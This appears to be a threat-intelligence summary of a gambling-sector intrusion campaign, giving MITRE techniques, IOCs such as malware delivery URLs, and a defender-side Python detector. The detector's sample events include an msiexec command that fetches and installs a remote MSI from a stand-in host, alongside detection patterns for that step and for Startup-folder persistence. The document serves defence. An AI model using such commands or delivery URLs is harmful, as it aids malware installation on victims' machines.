Operation Ice Breaker Targets The Gam(bl)ing Industry Right Before Its Biggest Gathering

IceBreaker APT is a newly tracked threat targeting the gambling/gaming sector in the run-up to ICE London, employing social engineering to lure a customer-service agent and delivering a two-stage payload chain. Researchers describe a modular Node.js-based backdoor (IceBreaker Backdoor) with Houdini RAT as a second stage, plus a range of IOCs, TTPs, and YARA rules, all associated with IceBreaker activity.
#IceBreaker #IceBreakerBackdoor

Keypoints

  • IceBreaker APT is a newly tracked actor targeting the gaming/gambling industry around ICE London.
  • Initial access relies on social engineering via a customer-service scenario, with attackers pretending to have login/registration issues.
  • The intrusion uses a two-stage delivery: a malicious LNK/VBS downloader presented during a chat conversation, leading to MSI/VBS payloads.
  • First stage LNK downloads an MSI that drops an IceBreaker Backdoor, or a VBS downloader that retrieves Houdini RAT.
  • The second stage includes a modular IceBreaker Backdoor written in Node.js, with features like process discovery, credential access, and a Socks5 proxy, plus a Houdini RAT variant.
  • Several IOCs and Yara rules are provided to help defenders detect IceBreaker activity, including deceptive domains and C2 infrastructure.

MITRE Techniques

  • [T1566.003] Spearphishing via Service – The attacker “pretend[s] to be a customer of the website with an issue” to initiate contact and deliver malicious content. [The Modus Operandi of the attacker is to pretend to be a customer of the website with an issue; this should be the first indicator that something is not right.]
  • [T1204.001] Malicious Link – The attacker distributes LNK/VBS content with links to download malicious content, masquerading as a screenshot tool. [The attacker is distributing LNK files via a set of domain names that mimic the legitimate domain “screenshot[.]net” … download the allegedly “screenshot”.]
  • [T1059.003] JavaScript – The second-stage backdoor embeds Node.js components and is executed as JavaScript-based logic. [the Node.js compiled binaries (.jsc) which are embedded in the malware executable and are being decoded at run-time. … Bytenode.]
  • [T1059.005] Visual Basic – The VBS downloader uses a Visual Basic Script with deception tricks. [The received file is a Visual Basic Script which has some tricks to deceive researchers during the analysis.]
  • [T1218.007] Msiexec – The LNK download chain abuses msiexec.exe to fetch and install an MSI payload. [downloads an additional MSI payload from its C2 server by abusing the trusted Windows binary msiexec.exe.]
  • [T1547.001] Boot or Logon Autostart Execution – Persistence via startup folder LNK file WINN.lnk. [Persistence is achieved by creating a new LNK file in the startup folder “Microsoft\Windows\Start Menu\Programs\Startup\WINN.lnk”.]
  • [T1036] Masquerading – The MSI package is crafted to appear as legitimate software. [The installer … pretending to be a legitimate software installer. … Avast Free Antivirus and Formware 3D were impersonated.]
  • [T1087.001] Local Account Discovery – Local account discovery during intrusions. [Local Account]
  • [T1057] Process Discovery – Discovery of running processes on the system. [Process Discovery]
  • [T1082] System Information Discovery – Gather system information. [System Information Discovery]
  • [T1113] Screen Capture – Capturing screenshots from the victim machine. [Screen Capture]
  • [T1572] Protocol Tunneling – Exfiltration/C2 over a tunneling protocol. [Protocol Tunneling]
  • [T1071.001] Web Protocols – C2 communications over web protocols. [Web Protocols]
  • [T1105] Ingress Tool Transfer – Downloading and delivering tools/assets from C2. [Ingress Tool Transfer]
  • [T1555.003] Credentials from Web Browsers – Stolen browser credentials/cookies. [Credentials from Web Browsers]
  • [T1539] Steal Web Session Cookies – Accessing web session cookies. [Steal Web Session Cookie]
  • [T1518] Software Discovery – Discovery of installed software. [Software Discovery]
  • [T1571] Non-Standard Port – C2 uses non-standard port for command and control. [Non-Standard Port]
  • [T1041] Exfiltration Over C2 Channel – Exfiltration over C2 channel via WebSockets. [Exfiltrate files to the remote server via web sockets.]
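As an added defender-side example (not code from the Security Joes report), the following Python check runs over constructed Sysmon-style events and flags two of the behaviours listed above: msiexec.exe launched with a remote URL on its command line (T1218.007) and an LNK file written into a Startup folder (T1547.001). The event fields, user paths and the download URL are all assumed/constructed for the demonstration.

```python
import re
from typing import Dict, List, Tuple

# Constructed, Sysmon-like events (not from the report): a benign local MSI
# install, an msiexec pulling an MSI from a remote URL, an LNK dropped into the
# per-user Startup folder, and an unrelated file write.
EVENTS: List[Dict[str, str]] = [
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\agent\Downloads\setup.msi" /qn'},
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /q /i https://down.example.invalid/92713"},
    {"type": "file", "image": r"C:\Windows\System32\msiexec.exe",
     "target": r"C:\Users\agent\AppData\Roaming\Microsoft\Windows"
               r"\Start Menu\Programs\Startup\WINN.lnk"},
    {"type": "file", "image": r"C:\Program Files\Editor\editor.exe",
     "target": r"C:\Users\agent\Documents\notes.txt"},
]

# A URL scheme anywhere on an msiexec command line means the package is
# fetched from the network rather than from a local path.
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

# Any .lnk created directly under a "Start Menu\Programs\Startup" folder
# (per-user or all-users) is an autostart persistence candidate.
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$",
                         re.IGNORECASE)


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (technique label, evidence) pairs for matching events."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if (ev["type"] == "process" and image == "msiexec.exe"
                and REMOTE_URL.search(ev["cmdline"])):
            findings.append(("T1218.007 msiexec remote MSI install",
                             ev["cmdline"]))
        if ev["type"] == "file" and STARTUP_LNK.search(ev["target"]):
            findings.append(("T1547.001 LNK written to Startup folder",
                             ev["target"]))
    return findings


if __name__ == "__main__":
    for label, evidence in detect(EVENTS):
        print(f"{label}: {evidence}")
```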

Indicators of Compromise

  • [Domains] IceBreaker distribution network domains – screenshotcap[.]com, screenshotlite[.]com, and 3 more domains
  • [IP] Command-and-control and distribution addresses – 178[.]63[.]65[.]51, 194[.]5[.]97[.]17
  • [Hashes] MSI payloads and backdoor files – c97293c4d10331f9bc47b041c8ce4e0e (MD5) and 978940d9785d3ade9f1c9b13ce35d67af2f47091740c2a4a5978e512543e6d76 (SHA256)
  • [Files] LNK and VBS delivery artifacts – WINN.lnk, Capimg.zip, Capimg.zip contents (Port.exe within MSI)
  • [URLs] Delivery/download URLs observed – hxxps://down.xn--screnshot-iib[.]net/92713 (LNK MSI delivery), https://www.dropbox[.]com/s/kb79h6dqgx78wm2/Capimg.zip?dl=1

Read more: https://www.securityjoes.com/post/operation-ice-breaker-targets-the-gam-bl-ing-industry-right-before-it-s-biggest-gathering